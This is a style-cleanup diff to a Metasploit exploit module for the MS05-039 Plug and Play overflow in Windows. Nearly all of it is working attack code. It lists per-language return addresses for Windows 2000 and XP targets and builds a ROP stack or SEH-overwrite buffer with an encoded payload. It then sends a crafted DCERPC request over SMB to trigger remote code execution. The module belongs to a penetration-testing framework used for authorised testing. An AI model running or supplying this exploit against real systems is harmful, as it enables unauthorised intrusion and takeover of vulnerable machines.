@@ -31,51 +31,55 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'MSB', 'MS05-039' ]
         ],
         'DefaultOptions' => {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC' => 'thread'
         },
         'Privileged' => true,
         'Payload' => {
           'Space' => 1000,
           'BadChars' => "\x00",
-          'StackAdjustment' => -3500,
+          'StackAdjustment' => -3500
         },
         'Platform' => 'win',
         'Targets' => [
           [
             'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
             {
-              'Ret' => 0x767a38f6, # umpnpmgr.dll
+              'Ret' => 0x767a38f6 # umpnpmgr.dll
             },
           ],
           [
             'Windows 2000 SP4 French',
             {
-              'Ret' => 0x767438f6, # French target by ExaProbe <fmourron@exaprobe.com>
+              'Author' => 'ExaProbe <fmourron@exaprobe.com>',
+              'Ret' => 0x767438f6
             },
           ],
           [
             'Windows 2000 SP4 Spanish',
             {
-              'Ret' => 0x767738f6, # umpnpmgr.dll
+              'Ret' => 0x767738f6 # umpnpmgr.dll
             },
           ],
           [
             # Tested on: English/French/German/Dutch/Finnish/Greek/Polish/Portuguese/Hungarian/Korean/Chinese/Arabic/Turkish/Russian
             'Windows 2000 SP4 Universal',
             {
-              'Ret' => 0x01013C79, # [Pita] [Houmous] <pita@mail.com>
+              'Author' => 'Pita Houmous <pita@mail.com>',
+              'Ret' => 0x01013C79
             },
           ],
           [
             'Windows 2000 SP0-SP4 German',
             {
-              'Ret' => 0x767338f6, # German target by Michael Thumann <mthumann@ernw.de>
+              'Author' => 'Michael Thumann <mthumann@ernw.de>',
+              'Ret' => 0x767338f6
             },
           ],
           [
             'Windows 2000 SP0-SP4 Italian',
             {
-              'Ret' => 0x7677366f, # acaro <acaro@jervus.it>
+              'Author' => 'acaro <acaro@jervus.it>',
+              'Ret' => 0x7677366f
             },
           ],
           [
@@ -83,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Ret' => 0x758c572a, # pop edi / pop ebx / ret in umpnpmgr.dll v5.1.2600.1106
               'Pipe' => 'ntsvcs',
-              'Offset' => 16,
+              'Offset' => 16
             }
           ],
           # NOTE: XP SP2, Server 2003 (and SP1) require an Administrator account to access
@@ -170,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Ret' => 0x780df756, # push esp / ret in msvcp60.dll
               'Pipe' => 'ntsvcs',
               'PtrToZero' => 0x757702c0, # PE data of umpnpmgr.dll
-              'Offset' => 72,
+              'Offset' => 72
             }
           ],
           [
@@ -326,16 +330,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
+        OptString.new('SMBPIPE', [ true, 'The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)', 'browser']),
       ]
     )
   end
 
   def pnp_probe(req, pipe = datastore['SMBPIPE'])
-    print_status("Connecting to the SMB service...")
+    print_status('Connecting to the SMB service...')
     begin
-      connect()
-      smb_login()
+      connect
+      smb_login
     rescue ::Exception => e
       print_error("Error: #{e.class} #{e}")
     end
@@ -358,20 +362,20 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # ResourceName:
     stubdata =
-      NDR.UnicodeConformantVaryingString("a\\b\\c") +  # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
+      NDR.UnicodeConformantVaryingString('a\\b\\c') +  # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
       NDR.long(0xffff) +                               # ResourceID: ResType_ClassSpecific
       NDR.UniConformantArray(cs_des) +                 # Resource (our CS_DES structure)
       NDR.long(cs_des.length) +                        # ResourceLen
       NDR.long(4) +                                    # OutputLen (at least 4)
       NDR.long(0)                                      # Flags
 
-    print_status("Calling the vulnerable function...")
+    print_status('Calling the vulnerable function...')
 
     begin
       dcerpc.call(0x36, stubdata)
     rescue Rex::Proto::DCERPC::Exceptions::NoResponse
       print_status('Server did not respond, this is expected')
-    rescue => e
+    rescue StandardError => e
       if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
         print_status('Server disconnected, this is expected')
       else
@@ -382,7 +386,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Cleanup
     disconnect
 
-    if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil and
+    if (!dcerpc.last_response.nil? and !dcerpc.last_response.stub_data.nil? and
         dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
       return true
     else
@@ -400,7 +404,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # If PtrToZero is set, we use saved-ret-overwrite instead of SEH.
-    if target['PtrToZero'] then
+    if target['PtrToZero']
       eip_off = target['Offset']
       nul_off = eip_off + 8
 
@@ -410,15 +414,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
         # Start with a randomized base buffer
         rop_length = target['RopStack'].length * 4
-        print_status("ROP Data is %u bytes" % rop_length)
+        print_status('ROP Data is %u bytes' % rop_length)
         buf = rand_text(esp_off + rop_length)
 
         # Put the rest of the stack data at where esp ends up...
-        target['RopStack'].each_with_index { |el, idx|
+        target['RopStack'].each_with_index do |el, idx|
           if el != 0x41414141
             buf[esp_off + (idx * 4), 4] = [el].pack('V')
           end
-        }
+        end
       else
         # Start with a randomized base buffer
         buf = rand_text(nul_off)
@@ -431,7 +435,7 @@ class MetasploitModule < Msf::Exploit::Remote
       buf[nul_off, 4] = [target['PtrToZero']].pack('V')
     else
       # Pad the string up to reach our SEH frame
-      buf = rand_text(target['Offset'] ? target['Offset'] : 56)
+      buf = rand_text(target['Offset'] || 56)
 
       # Jump over the address and our invalid pointer to the payload
       buf << Rex::Arch::X86.jmp_short('$+32')
@@ -451,7 +455,7 @@ class MetasploitModule < Msf::Exploit::Remote
     buf << payload.encoded
 
     # Determine which pipe to use
-    pipe = target['Pipe'] ? target['Pipe'] : datastore['SMBPIPE']
+    pipe = target['Pipe'] || datastore['SMBPIPE']
 
     pnp_probe(buf, pipe)
 
